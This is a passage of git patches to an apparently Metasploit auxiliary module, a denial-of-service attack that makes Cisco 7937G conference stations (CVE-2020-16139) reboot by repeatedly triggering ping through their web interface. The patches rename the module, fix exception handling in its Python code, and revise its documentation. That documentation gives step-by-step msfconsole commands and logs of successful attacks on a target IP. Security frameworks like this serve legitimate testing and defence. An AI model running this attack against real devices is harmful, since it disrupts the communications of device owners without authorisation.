auxiliary(dos/cisco/cve_2020_16139) > run [*] 192.168.110.209 - DoS reset attack completed! [*] Auxiliary module execution completed ``` + +### Cisco 7937G Running Firmware Version SCCP-1-4-5-5 +``` +msf5 > use auxiliary/dos/cisco/cve_2020_16139 +msf5 auxiliary(dos/cisco/cve_2020_16139) > set rhost 192.168.110.209 +rhost => 192.168.110.209 +msf5 auxiliary(dos/cisco/cve_2020_16139) > run + +[*] Starting server... +[*] 192.168.110.209 - Sending DoS Packets. Stand by. +[*] 192.168.110.209 - DoS reset attack completed! +[*] Auxiliary module execution completed +``` From cfea0db83c8ed5d2f494af02fafcbdc2ec013977 Mon Sep 17 00:00:00 2001 From: debifrank Date: Mon, 17 Aug 2020 20:24:17 -0400 Subject: [PATCH 20/22] Rename cve_2020_16139.py to cisco_7937g_dos_reboot.py --- .../dos/cisco/{cve_2020_16139.py => cisco_7937g_dos_reboot.py} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/dos/cisco/{cve_2020_16139.py => cisco_7937g_dos_reboot.py} (100%) diff --git a/modules/auxiliary/dos/cisco/cve_2020_16139.py b/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py similarity index 100% rename from modules/auxiliary/dos/cisco/cve_2020_16139.py rename to modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py From e74a8f38e9822097a569c8ac1851d44ebcacb0da Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Fri, 21 Aug 2020 09:01:45 -0500 Subject: [PATCH 21/22] misaligned except statement --- modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) mode change 100644 => 100755 modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py diff --git a/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py b/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py old mode 100644 new mode 100755 index 1114a3020e..2696f90856 --- a/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py +++ b/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py @@ -27,7 +27,7 @@ metadata = { 'name': 'Cisco 7937G Denial-of-Service Reboot Attack', 'description': ''' This module exploits a bug in how the conference station handles - executing a ping via it's web interface. By repeatedly executing + executing a ping via its web interface. By repeatedly executing the ping function without clearing out the resulting output, a DoS is caused that will reset the device after a few minutes. ''', @@ -79,10 +79,10 @@ def run(args): except requests.exceptions.ReadTimeout as e: logging.info('DoS reset attack completed!') return - except requests.exceptions.RequestException as e: - logging.info('An unexpected exception occurred: ' + str(e)) - logging.info('The device may be DoS\'d already or not have web access enabled.') - return + except requests.exceptions.RequestException as e: + logging.info('An unexpected exception occurred: ' + str(e)) + logging.info('The device may be DoS\'d already or not have web access enabled.') + return if __name__ == '__main__': From 1abe6ad32bae2870d73ac9bc708fa698bd1b14e1 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Fri, 21 Aug 2020 09:11:37 -0500 Subject: [PATCH 22/22] msftidy, module name fixes --- .../dos/cisco/cisco_7937g_dos_reboot.md | 28 ++++++++++++------- 1 file changed, 18 insertions(+), 10 deletions(-) diff --git a/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md b/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md index 568826dd57..d6731f4ed4 100644 --- a/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md +++ b/documentation/modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.md @@ -2,29 +2,36 @@ [Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station. This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7. - + ### Description - -This module exploits a bug in how the conference station handles executing a ping via it's web interface. By repeatedly executing the ping function without clearing out the resulting output, a DoS is caused that will reset the device after a few minutes. + + This module exploits a bug in how the conference station handles executing a ping via its web interface. + By repeatedly executing the ping function without clearing out the resulting output, + a DoS is caused that will reset the device after a few minutes. ## Verification Steps 1. Obtain a Cisco 7937G Conference Station. 2. Enable Web Access on the device (default configuration). 3. Start msfconsole - 4. Do: `use auxiliary/dos/cisco/cve_2020_16139` + 4. Do: `use auxiliary/dos/cisco/cisco_7937g_dos_reboot` 5. Do: `set rhost 192.168.1.10` 6. Do: `run` 7. The conference station should become nonresponsive and then power cycle itself. +## Options + + No options + ## Scenarios ### Cisco 7937G Running Firmware Version SCCP-1-4-5-7 + ``` -msf5 > use auxiliary/dos/cisco/cve_2020_16139 -msf5 auxiliary(dos/cisco/cve_2020_16139) > set rhost 192.168.110.209 +msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot +msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209 rhost => 192.168.110.209 -msf5 auxiliary(dos/cisco/cve_2020_16139) > run +msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run [*] Starting server... [*] 192.168.110.209 - Sending DoS Packets. Stand by. @@ -33,11 +40,12 @@ msf5 auxiliary(dos/cisco/cve_2020_16139) > run ``` ### Cisco 7937G Running Firmware Version SCCP-1-4-5-5 + ``` -msf5 > use auxiliary/dos/cisco/cve_2020_16139 -msf5 auxiliary(dos/cisco/cve_2020_16139) > set rhost 192.168.110.209 +msf5 > use auxiliary/dos/cisco/cisco_7937g_dos_reboot +msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > set rhost 192.168.110.209 rhost => 192.168.110.209 -msf5 auxiliary(dos/cisco/cve_2020_16139) > run +msf5 auxiliary(dos/cisco/cisco_7937g_dos_reboot) > run [*] Starting server... [*] 192.168.110.209 - Sending DoS Packets. Stand by.